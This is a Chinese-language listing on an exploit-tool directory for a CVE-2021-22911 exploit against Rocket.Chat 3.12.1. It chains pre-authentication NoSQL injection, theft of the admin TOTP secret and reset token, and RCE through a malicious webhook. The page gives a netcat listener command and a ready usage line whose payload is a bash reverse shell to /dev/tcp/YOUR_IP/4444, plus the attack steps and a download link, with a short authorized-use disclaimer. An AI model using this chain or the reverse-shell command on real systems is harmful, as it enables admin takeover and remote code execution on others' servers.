Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-22911-RocketChat — Rocket.Chat 3.12.1 的漏洞利用,通过预认证 NoSQL 注入实现 RCE,泄露管理员 TOTP 密钥和密码重置令牌,进而通过恶意 webhook 集成实现远程代码执行。 | Kitploit
工具/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

Rocket.Chat 3.12.1 的漏洞利用,通过预认证 NoSQL 注入实现 RCE,泄露管理员 TOTP 密钥和密码重置令牌,进而通过恶意 webhook 集成实现远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
226个月前尚未审核
分享

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE(临时编写)

描述

利用 Rocket.Chat 3.12.1 中的预认证 NoSQL 注入漏洞,泄露管理员的 TOTP 密钥和密码重置令牌,接管管理员账户,并通过恶意 webhook 集成实现 RCE。

受影响版本

Rocket.Chat <= 3.12.1

环境要求

pip install -r requirements.txt

设置 - 先启动监听器

运行漏洞利用脚本之前,请在另一个终端中启动 netcat 监听器,以接收传入的反弹 shell:

root@kitploit:~
nc -lvnp 4444

保持此终端打开。漏洞利用成功运行后,你的 shell 将出现在此处。

使用方法

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

参数

工作原理

  1. 以低权限用户身份通过 DDP 协议进行身份验证
  2. 通过 NoSQL $where 注入泄露管理员 TOTP 密钥
  3. 触发管理员密码重置邮件
  4. 通过 NoSQL $where 注入泄露管理员密码重置令牌
  5. 利用泄露的 TOTP 密钥绕过 2FA 重置管理员密码
  6. 创建恶意 webhook 集成并触发 RCE

免责声明

本工具仅用于教育目的和经授权的渗透测试。作者不对因使用本工具而造成的任何滥用或损害负责。测试前请务必获得正式的书面授权。

参考资料

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
下载工具
参数说明
-t目标 Rocket.Chat URL
-u你注册的低权限用户名
-p你注册的低权限密码
-e管理员邮箱地址
-a管理员用户名
-c反弹 shell 命令
-v详细模式(显示原始响应)